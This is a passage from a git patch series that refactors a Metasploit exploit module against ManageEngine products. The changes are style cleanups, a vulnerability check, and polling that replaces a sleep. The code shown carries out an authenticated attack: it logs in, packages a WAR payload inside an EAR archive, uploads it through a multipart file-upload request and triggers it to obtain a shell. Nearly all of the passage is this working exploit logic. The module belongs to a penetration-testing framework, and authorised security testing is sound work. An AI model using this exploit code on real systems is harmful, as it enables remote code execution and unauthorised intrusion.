         'timestamp' => Time.now.to_i
       },
       'vars_post' => vars_post
@@ -210,14 +213,14 @@ class Metasploit3 < Msf::Exploit::Remote
     # Do we already have a valid cookie? If yes, just return that.
     if datastore['IAMAGENTTICKET'] != nil
       cookie_name = get_it360_cookie_name
-      cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";"
+      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
       return cookie
     end
 
     # get the correct path, host and port
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri("/"),
+      'uri' => normalize_uri('/'),
     })
 
     if res && res.redirect?
@@ -242,7 +245,8 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    return nil
+
+    nil
   end
 
 
@@ -254,8 +258,8 @@ class Metasploit3 < Msf::Exploit::Remote
   def authenticate(cookie, username, password)
     res = send_request_cgi!({
       'method' => 'POST',
-      'uri' => normalize_uri("/j_security_check;" + cookie.to_s.gsub(";","")),
-      'ctype' => "application/x-www-form-urlencoded",
+      'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
+      'ctype' => 'application/x-www-form-urlencoded',
       'cookie' => cookie,
       'vars_post' => {
         'j_username' => username,
@@ -267,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # sd and ae respond with 302 while sc responds with a 200
       res = send_request_cgi({
         'method' => 'GET',
-        'uri' => normalize_uri("/HomePage.do")
+        'uri' => normalize_uri('/HomePage.do')
       })
       return true
     else
@@ -279,14 +283,14 @@ class Metasploit3 < Msf::Exploit::Remote
   def login
     # Do we already have a valid cookie? If yes, just return that.
     if datastore['JSESSIONID'] != nil
-      cookie = "JSESSIONID=" + datastore['JSESSIONID'].to_s + ";"
+      cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
       return cookie
     end
 
     # First we get a valid JSESSIONID to pass to authenticate()
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri("/")
+      'uri' => normalize_uri('/')
     })
     if res && res.code == 200
       cookie = res.get_cookies
@@ -307,7 +311,8 @@ class Metasploit3 < Msf::Exploit::Remote
         end
       end
     end
-    return nil
+
+    nil
   end
 
 
@@ -322,18 +327,18 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if @my_target == targets[1]
       # old style
-      post_data.add_part(payload_str, "application/octet-stream", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
       post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
-      post_data.add_part("", nil, nil, "form-data; name=\"vecPath\"")
-      post_data.add_part("", nil, nil, "form-data; name=\"vec\"")
-      post_data.add_part("AttachFile", nil, nil, "form-data; name=\"theSubmit\"")
-      post_data.add_part("WorkOrderForm", nil, nil, "form-data; name=\"formName\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
+      post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
+      post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
       post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
-      post_data.add_part("Attach", nil, nil, "form-data; name=\"ATTACH\"")
+      post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
     else
       post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
-      post_data.add_part(payload_str, "application/octet-stream", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
-      post_data.add_part("", nil, nil, "form-data; name=\"att_desc\"")
+      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
     end
 
     data = post_data.to_s
@@ -352,12 +357,12 @@ class Metasploit3 < Msf::Exploit::Remote
     return target if target.name != 'Automatic'
 
     version = get_version
-    if (version[0] <= 7 && version[2] < 7016 && version[3] == "sd") ||
-    (version[0] == 4 && version[3] == "ae") ||
-    (version[3] == "sc")
+    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
+    (version[0] == 4 && version[3] == 'ae') ||
+    (version[3] == 'sc')
       # These are all "old style" versions (sc is always old style)
       return targets[1]
-    elsif version[3] == "it"
+    elsif version[3] == 'it'
       return targets[3]
     else
       return targets[2]
@@ -389,9 +394,9 @@ class Metasploit3 < Msf::Exploit::Remote
     # Zipping with CM_STORE to avoid errors while decompressing the zip
     # in the Java vulnerable application
     ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
-    ear_file.add_file(war_app_base + ".war", war_payload.to_s)
-    ear_file.add_file("META-INF/application.xml", app_xml)
-    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
+    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
+    ear_file.add_file('META-INF/application.xml', app_xml)
+    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
 
     if @my_target != targets[3]
       # Linux doesn't like it when we traverse non existing directories,
@@ -409,7 +414,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
     if res && res.code == 200
       print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
-      " seconds for deployment")
+      ' seconds for deployment')
       sleep(datastore['SLEEP'])
     else
       fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")

From ed26a2fd77167ef3c1fc1ec28b18ee6aec2999cd Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 19 Jan 2015 17:11:31 -0600
Subject: [PATCH 6/8] Avoid modify datastore options

---
 .../multi/http/manageengine_auth_upload.rb    | 29 ++++++++++---------
 1 file changed, 16 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
index f1758dfa69..6b2f66d138 100644
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -163,29 +163,25 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     else
       vars_post = {
-          'LOGIN_ID' => username,
-          'PASSWORD' => password,
-          'isADEnabled' => 'true',
-          'domainName' => datastore['DOMAIN_NAME']
+        'LOGIN_ID' => username,
+        'PASSWORD' => password,
+        'isADEnabled' => 'true',
+        'domainName' => datastore['DOMAIN_NAME']
       }
     end
 
-    sd_port = datastore['RPORT']
-    datastore['RPORT'] = port
-
     res = send_request_cgi({
+      'rport'  => port,
       'method' => 'POST',
-      'uri' => normalize_uri(path),
+      'uri'    => normalize_uri(path),
       'vars_get' => {
-        'service' => 'ServiceDesk',
-        'furl' => '/',
+        'service'   => 'ServiceDesk',
+        'furl'      => '/',
         'timestamp' => Time.now.to_i
       },
       'vars_post' => vars_post
     })
 
-    datastore['RPORT'] = sd_port
-
     if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
       # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
       return res.get_cookies
@@ -211,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def login_it360
     # Do we already have a valid cookie? If yes, just return that.
-    if datastore['IAMAGENTTICKET'] != nil
+    if datastore['IAMAGENTTICKET']
       cookie_name = get_it360_cookie_name
       cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
       return cookie
@@ -230,6 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
+
     if cookie != nil
       return cookie
     elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
@@ -371,6 +368,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
+    end
+
+    print_status("#{peer} - Selecting target...")
     @my_target = pick_target
     print_status("#{peer} - Selected target #{@my_target.name}")
 
@@ -379,6 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       cookie = login
     end
+
     if cookie == nil
       fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
     end

From a6e351ef5db4c52ca604583775d61213181ff69b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 19 Jan 2015 17:14:23 -0600
Subject: [PATCH 7/8] Delete unnecessary request

---
 modules/exploits/multi/http/manageengine_auth_upload.rb | 6 +-----
 1 file changed, 1 insertion(+), 5 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
index 6b2f66d138..a8a46b16cb 100644
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -265,11 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
     if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
-    # sd and ae respond with 302 while sc responds with a 200
-      res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri('/HomePage.do')
-      })
+      # sd and ae respond with 302 while sc responds with a 200
       return true
     else
       return false

From 6403098fbc6f477bf3907d4ec6715a94a24e94f5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 19 Jan 2015 17:22:04 -0600
Subject: [PATCH 8/8] Avoid sleep(), survey instead

---
 .../multi/http/manageengine_auth_upload.rb    | 33 +++++++++++--------
 1 file changed, 20 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
index a8a46b16cb..4f275937bc 100644
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -67,8 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8080),
-        OptInt.new('SLEEP',
-          [true, 'Seconds to sleep while we wait for EAR deployment', 15]),
         OptString.new('JSESSIONID',
           [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
         OptString.new('IAMAGENTTICKET',
@@ -378,7 +376,7 @@ class Metasploit3 < Msf::Exploit::Remote
       cookie = login
     end
 
-    if cookie == nil
+    if cookie.nil?
       fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
     end
 
@@ -388,7 +386,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # ... and then we create an EAR file that will contain it.
     ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
+    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+    app_xml << '<application>'
+    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
+    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
+    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
 
     # Zipping with CM_STORE to avoid errors while decompressing the zip
     # in the Java vulnerable application
@@ -412,19 +414,24 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Uploading EAR file...")
     res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
     if res && res.code == 200
-      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
-      ' seconds for deployment')
-      sleep(datastore['SLEEP'])
+      print_status("#{peer} - Upload appears to have been successful")
     else
       fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
     end
 
-    res = send_request_cgi({
-      'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
-      'method' => 'GET'
-    })
-    if res && res.code != 200
-      fail_with(Exploit::Failure::Unknown, "#{peer} - Exploit failed, received HTTP " + res.code.to_s)
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
     end
   end
 end